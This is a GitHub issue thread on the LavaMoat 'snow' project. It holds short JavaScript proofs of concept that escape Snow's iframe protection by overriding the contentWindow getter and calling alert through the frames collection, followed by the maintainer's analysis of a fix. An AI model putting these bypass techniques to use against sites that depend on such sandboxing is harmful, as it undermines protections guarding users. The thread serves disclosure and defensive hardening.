Bypass using by making contentWindow to throw an exception

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!

https://lavamoat.github.io/snow/demo/

MIT License

102 stars 9 forks source link

Bypass using by making contentWindow to throw an exception #98

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago

var f = document.createElement('iframe');
Object.defineProperty(f, 'contentWindow', {
    get: function() {
        throw new Error('pwnd');
    }
});
try {
    document.body.appendChild(f);
} catch (e) {}
frames[0].alert(1);

This is what I mean here, but actually exploits the chromium bug workaround this time :)

weizman commented 1 year ago

Even worse, this contentWindow access can be trapped completely

var f = document.createElement('iframe');
Object.defineProperty(f, 'contentWindow', {
    get: function() {
        window[0].alert(1)
    }
});
document.body.appendChild(f);

Which is a problem on one hand, but can't see a way around it atm...

mmndaniel commented 1 year ago

Can't you use the native getter? var _get =Object.getOwnPropertyDescriptor(HTMLIFrameElement.prototype, 'contentWindow').get (same with embed, etc), I guess the question if it will make it appear in frames.

weizman commented 1 year ago

so after some research the chromium bug is different than i thought, but that's good news. it doesn't require access specifically to contentWindow, but a broader and more abstract manipulation on the object. luckily (for a reason i don't understand), running Object.getOwnPropertyDescriptor(frame, 'xxx') on it works too (which in contrast to the former method, this one cannot be trapped).